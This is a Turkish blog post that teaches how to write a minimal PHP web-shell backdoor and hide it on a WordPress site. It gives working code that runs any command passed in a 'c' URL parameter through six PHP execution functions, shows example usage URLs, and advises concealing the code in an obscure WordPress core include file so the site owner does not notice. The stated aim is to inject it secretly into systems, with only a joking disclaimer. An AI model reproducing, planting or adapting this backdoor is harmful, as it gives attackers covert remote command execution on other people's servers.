PHP Basit Backdoor Oluşturma

PHP Basit Backdoor Oluşturma
PHP Basit Backdoor Oluşturma

Merhaba dostlar,

Uzun zamandır güvenlik kategorisine teknik bir yazı yazmıyorduk, bu yazımda basit bir php backdoor oluşturacağız, bunu sistemlere gizlice enjekte edeceğiz ve istediğimiz zaman kullanacağız.

Bu arada bundan sonraki yazılarım için Türkçenin yanında İngilizce de yazmayı düşünüyorum… Nasıl olur sizce?

 

Backdoor Nedir?

Bir sisteme daha sonradan tekrar yetkili erişim sağlayabilmek için bırakılan dosyalardır, Türkçesi arka kapıdır, güzel gizlendiği zaman çok büyük sorunlara yol açabilir.

Az sonra sizinle güzel ve kullanması basit bi backdoor yazacağız, sonra size bi de bunu gizleme taktikleri vericem, kötü amaçların için kullanmayın ama. 😀

 

Basit Bir Betik Yazalım

Siz dosya upload, file explorer tarzı bir backdoor da yazabilirsiniz fakat ben en etkili kullanım için komut çalıştırmaya dayalı bir betik yazacağım.

Boyutu ve içeriği olabildiğince kısa tutacağım.

<?php

$x= $_GET["c"];

if($x){

echo exec($x);

echo shell_exec($x);

echo popen($x);

echo passthru($x);

echo proc_open($x);

echo system($x);

}

?>

c parametresinden gelen içeriği 6 adet fonksiyonla çalıştırdık.Mevzubahis kodların kodların engellenmediği bir sunucuda büyük etkiler bırakabilirsiniz.

Kullanım:

site.com/<dosya>.php?c=<komut>

Örnek: numanozdemir.com/x.php?c=ls

Gizleme Taktiği

Nereye, ne kadar çok yere gizlerseniz sizin faydanıza fakat bu kodları tutup index.php’ye eklerseniz hem kullanım alanınız daralır hem de site sahibi fark edebilir.

WordPress bir siteye eklediğinizi varsayarak anlatacağım, hepsi birbirine benzer özellik gösteriyor zaten.

wp-config.php dosyası sitedeki bütün dosyalarda kullanılıyor bildiğiniz üzere, fakat wp-config.php dosyası da kontrol edileceği için bu dosyaya da eklemeyeceğiz.

wp-config.php’nin kodları içinde,

require_once(ABSPATH . 'wp-settings.php');

satırını görebiliriz.

wp-settings.php’nin kodlarına baktığımızda da aşağıdaki satırı görebiliriz,

require( ABSPATH . WPINC . '/rest-api/fields/class-wp-rest-meta-fields.php' );

/wp-includes/rest-api/fields/class-wp-rest-meta-fields.php dosyası ilgi çekmez, bu yüzden bu dosyaya veya bunun gibi tahmin edilmesi güç bir dosyaya backdoor’umuzun kodlarını ekleyebiliriz.

Sonra da yukarıda anlattığım gibi ?c=<komut> şeklinde kullanacağız.

Umarım yararlı olur, sağlıcakla kalın.

Yazıya gelen yorumlar:

Yorum yok.

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Yazı URL